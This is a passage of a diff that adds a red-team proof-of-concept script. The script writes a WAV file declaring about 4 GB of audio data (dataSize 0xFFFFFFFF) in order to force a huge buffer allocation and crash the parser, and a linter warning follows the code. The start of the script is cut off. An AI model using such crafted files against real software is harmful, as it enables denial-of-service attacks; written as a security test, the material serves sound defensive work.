tests/redteam/poc_wav_heap_exhaust.py

```
@@ -0,0 +1,42 @@
+    struct.pack_into('<I', b, riff_size_pos, len(b) - 8)
+    return bytes(b)
+
+def main():
+    output = sys.argv[1] if len(sys.argv) > 1 else 'poc_heap_exhaust.wav'
+    wav = build_wav()
+    with open(output, 'wb') as f:
+        f.write(wav)
+    sz = os.path.getsize(output)
+    ds = struct.unpack('<I', wav[wav.find(b'data')+4:wav.find(b'data')+8])[0]
+    print(f"[+] PoC: {output} ({sz} bytes, declares {ds/1e9:.1f} GB of audio)")
+    print(f"[+] dataSize=0xFFFFFFFF → resize(2.1B floats) → ~8.5 GB → crash")
```

Ruff (0.15.9)

[error] f-string without any placeholders

Remove extraneous `f` prefix

(F541)